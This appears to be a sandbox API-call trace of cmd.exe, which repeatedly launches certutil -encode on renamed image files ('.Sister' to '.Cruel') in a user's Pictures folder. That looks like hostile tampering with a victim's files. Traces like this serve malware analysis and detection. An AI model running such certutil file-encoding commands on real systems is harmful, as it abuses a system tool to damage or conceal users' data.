0x1d [0297.017] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0297.017] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0297.017] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0297.017] GetProcessHeap () returned 0x21ed8c70000 [0297.017] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45bf0 [0297.017] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0297.017] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0297.017] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0297.017] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0297.017] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0297.017] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.017] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.017] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.017] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0297.018] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0297.018] GetProcessHeap () returned 0x21ed8c70000 [0297.019] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45bf0) returned 1 [0297.019] GetProcessHeap () returned 0x21ed8c70000 [0297.019] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95840 [0297.019] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0297.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0297.019] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0297.019] _get_osfhandle (_FileHandle=0) returned 0x4c [0297.019] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0297.019] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"E8sv92vO_xVbOO.jpg.Sister\" \"E8sv92vO_xVbOO.jpg.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Pictures", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"E8sv92vO_xVbOO.jpg.Sister\" \"E8sv92vO_xVbOO.jpg.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"E8sv92vO_xVbOO.jpg.Sister\" \"E8sv92vO_xVbOO.jpg.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0xe2c, dwThreadId=0xe30)) returned 1 [0297.031] CloseHandle (hObject=0xa8) returned 1 [0297.031] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0297.031] GetProcessHeap () returned 0x21ed8c70000 [0297.032] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0297.032] GetEnvironmentStringsW () returned 0x21ed8d44630* [0297.032] GetProcessHeap () returned 0x21ed8c70000 [0297.032] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0297.032] FreeEnvironmentStringsA (penv="=") returned 1 [0297.032] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0297.683] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0297.683] CloseHandle (hObject=0xa4) returned 1 [0297.684] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0297.684] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0297.684] GetProcessHeap () returned 0x21ed8c70000 [0297.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0297.684] GetEnvironmentStringsW () returned 0x21ed8d44630* [0297.684] GetProcessHeap () returned 0x21ed8c70000 [0297.684] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0297.684] FreeEnvironmentStringsA (penv="=") returned 1 [0297.684] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0297.684] GetProcessHeap () returned 0x21ed8c70000 [0297.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0297.684] GetEnvironmentStringsW () returned 0x21ed8d44630* [0297.685] GetProcessHeap () returned 0x21ed8c70000 [0297.685] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0297.685] FreeEnvironmentStringsA (penv="=") returned 1 [0297.685] GetProcessHeap () returned 0x21ed8c70000 [0297.685] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95840) returned 1 [0297.685] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0297.685] ??_V@YAXPEAX@Z () returned 0x1 [0297.685] FindNextFileW (in: hFindFile=0x21ed8c7cbe0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf54a76c0, ftCreationTime.dwHighDateTime=0x1d5effd, ftLastAccessTime.dwLowDateTime=0x6e829c50, ftLastAccessTime.dwHighDateTime=0x1d5e59c, ftLastWriteTime.dwLowDateTime=0x6e829c50, ftLastWriteTime.dwHighDateTime=0x1d5e59c, nFileSizeHigh=0x0, nFileSizeLow=0xa5c0, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="F0Gamc8uxcBiM.png.Sister", cAlternateFileName="")) returned 1 [0297.685] GetProcessHeap () returned 0x21ed8c70000 [0297.685] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7c670, Size=0x140) returned 0x21ed8d6ae90 [0297.685] GetProcessHeap () returned 0x21ed8c70000 [0297.685] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6ae90) returned 0x140 [0297.685] GetProcessHeap () returned 0x21ed8c70000 [0297.685] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d56620 [0297.685] GetProcessHeap () returned 0x21ed8c70000 [0297.685] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d56620, Size=0x58) returned 0x21ed8d56620 [0297.685] GetProcessHeap () returned 0x21ed8c70000 [0297.685] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56620) returned 0x58 [0297.685] GetProcessHeap () returned 0x21ed8c70000 [0297.685] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d56690 [0297.685] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0297.686] GetProcessHeap () returned 0x21ed8c70000 [0297.686] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7c160 [0297.686] ??_V@YAXPEAX@Z () returned 0x1 [0297.686] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0297.686] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cc40 [0297.686] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0297.686] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cf40 [0297.686] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0297.687] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xdbed63d4, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdbed63d4, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7ce20 [0297.687] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0297.687] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F0Gamc8uxcBiM.png.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf54a76c0, ftCreationTime.dwHighDateTime=0x1d5effd, ftLastAccessTime.dwLowDateTime=0x6e829c50, ftLastAccessTime.dwHighDateTime=0x1d5e59c, ftLastWriteTime.dwLowDateTime=0x6e829c50, ftLastWriteTime.dwHighDateTime=0x1d5e59c, nFileSizeHigh=0x0, nFileSizeLow=0xa5c0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="F0Gamc8uxcBiM.png.Sister", cAlternateFileName="F0GAMC~1.SIS")) returned 0x21ed8c7cc40 [0297.687] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0297.687] _wcsnicmp (_String1="F0GAMC~1.SIS", _String2="F0Gamc8uxcBiM.png.Sister", _MaxCount=0x18) returned 70 [0297.687] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0297.687] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0297.687] GetProcessHeap () returned 0x21ed8c70000 [0297.687] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc8850 [0297.688] ??_V@YAXPEAX@Z () returned 0x1 [0297.688] ??_V@YAXPEAX@Z () returned 0x1 [0297.688] GetProcessHeap () returned 0x21ed8c70000 [0297.688] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d56690, Size=0x200) returned 0x21ed8d56690 [0297.688] GetProcessHeap () returned 0x21ed8c70000 [0297.697] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56690) returned 0x200 [0297.698] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0297.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0297.698] GetFileType (hFile=0x50) returned 0x2 [0297.698] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0297.698] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0297.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0297.699] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0297.717] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0297.717] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0297.717] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0297.717] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0297.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0297.717] GetFileType (hFile=0x50) returned 0x2 [0297.717] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0297.717] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0297.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0297.718] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0297.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0297.718] GetFileType (hFile=0x50) returned 0x2 [0297.718] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0297.718] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0297.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0297.719] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d56630*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d56630*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0297.719] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"F0Gamc8uxcBiM.png.Sister\" \"F0Gamc8uxcBiM.png.Cruel\" ") returned 62 [0297.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0297.719] GetFileType (hFile=0x50) returned 0x2 [0297.720] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0297.720] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0297.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0297.720] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x3e) returned 1 [0297.721] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0297.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0297.721] GetFileType (hFile=0x50) returned 0x2 [0297.721] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0297.721] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0297.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0297.721] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0297.743] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0297.744] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0297.744] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0297.744] malloc (_Size=0xffce) returned 0x21eda100000 [0297.744] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0297.744] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0297.744] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0297.744] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0297.744] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0297.745] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0297.745] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0297.745] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0297.745] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0297.745] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0297.745] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0297.745] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0297.745] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0297.745] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0297.745] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0297.745] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0297.745] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0297.745] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0297.745] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0297.745] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0297.745] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0297.745] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0297.745] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0297.745] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0297.745] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0297.745] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0297.745] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0297.745] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0297.745] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0297.745] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0297.746] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0297.746] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0297.746] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0297.746] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0297.746] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0297.746] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0297.746] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0297.746] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0297.746] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0297.746] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0297.746] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0297.746] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0297.746] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0297.746] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0297.746] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0297.769] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0297.769] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0297.769] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0297.769] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0297.769] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0297.769] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0297.769] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0297.769] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0297.769] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0297.769] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0297.769] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0297.769] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0297.769] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0297.769] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0297.769] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0297.769] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0297.769] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0297.769] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0297.769] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0297.769] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0297.769] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0297.770] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0297.770] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0297.770] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0297.770] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0297.770] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0297.770] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0297.770] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0297.770] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0297.770] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0297.770] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0297.770] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0297.770] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0297.770] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0297.770] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0297.770] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0297.770] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0297.770] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0297.770] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0297.770] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0297.770] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0297.770] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0297.770] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0297.771] ??_V@YAXPEAX@Z () returned 0x1 [0297.771] GetProcessHeap () returned 0x21ed8c70000 [0297.771] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93a0140 [0297.771] GetProcessHeap () returned 0x21ed8c70000 [0297.771] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x9e) returned 0x21ed8d6afe0 [0297.771] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0297.771] malloc (_Size=0xffce) returned 0x21eda100000 [0297.771] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0297.771] GetProcessHeap () returned 0x21ed8c70000 [0297.771] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8cc9750 [0297.771] SetErrorMode (uMode=0x0) returned 0x0 [0297.771] SetErrorMode (uMode=0x1) returned 0x0 [0297.772] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8cc9760, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0xa6cf4fdb80*="Pictures") returned 0x18 [0297.772] SetErrorMode (uMode=0x0) returned 0x1 [0297.772] GetProcessHeap () returned 0x21ed8c70000 [0297.772] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc9750, Size=0x54) returned 0x21ed8cc9750 [0297.772] GetProcessHeap () returned 0x21ed8c70000 [0297.772] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc9750) returned 0x54 [0297.772] GetEnvironmentVariableW (in: lpName="PATH", 